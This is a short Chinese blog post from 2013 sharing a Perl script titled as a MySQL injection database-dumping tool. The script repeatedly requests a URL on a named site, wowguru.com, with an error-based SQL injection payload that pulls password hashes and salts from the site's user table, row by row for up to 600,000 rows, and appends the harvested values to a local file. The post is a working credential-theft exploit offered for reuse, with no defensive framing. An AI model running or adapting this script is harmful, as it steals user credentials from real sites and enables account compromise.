mysql注入导库脚本

#!/usr/bin/perl -w

#改版权不得好死...
#转载须注明
#语法 自己改改

use strict;
use LWP::Simple;
use utf8;

$|++;


my $count = 1;
for ($count = 1; $count <= 600_000; $count++) {
    print 'ID: ', $count, "\n";
    my $url = 'http://www.wowguru.com/links.php?out=2 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x5e24,0x7c,password,0x3A,salt,0x245e) FROM `wowguru_db`.user LIMIT%20' . $count . ',1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1';
    
    #print "$url\n";
    
    my $content = get($url);

    while ($content =~ m|\^\$(.+?)\$\^|igs) {
        open FILE, ">>", "password.txt" or die $!;
        print "$1\n";
        print FILE "$1\n";
        close FILE;
    }
}

 

posted on 2013-12-28 16:48  =_=!  阅读(110)  评论(0编辑  收藏  举报

导航